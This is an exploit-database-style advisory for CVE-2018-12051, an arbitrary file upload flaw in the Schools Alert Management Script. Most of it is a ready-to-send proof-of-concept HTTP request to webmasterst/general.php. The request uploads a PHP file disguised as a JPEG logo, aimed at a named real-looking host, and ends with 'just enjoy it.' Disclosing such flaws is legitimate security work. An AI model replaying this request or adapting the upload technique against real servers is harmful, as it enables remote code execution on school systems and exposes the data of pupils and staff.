[CVE-2018-12051] Schools Alert Management Script - Arbitrary File Upload

[unh3x]

=================
Schools Alert Management Script - Arbitrary File Upload

Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12051

=================
Vulnerable cgi:

webmasterst/general.php

=================
Proof of Concept:

POST /schoolalert/webmasterst/general.php HTTP/1.1
Host: www.schoolcollageerp.com
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------212590549826078610017859173
Content-Length: 369

-----------------------------212590549826078610017859173
Content-Disposition: form-data; name="sch_logo"; filename="x1.php"
Content-Type: image/jpeg

<?php phpinfo();@unlink(__FILE__);?>
-----------------------------212590549826078610017859173
Content-Disposition: form-data; name="submit.x"

1
-----------------------------212590549826078610017859173--

.

Shell is shown in response data, just enjoy it.

.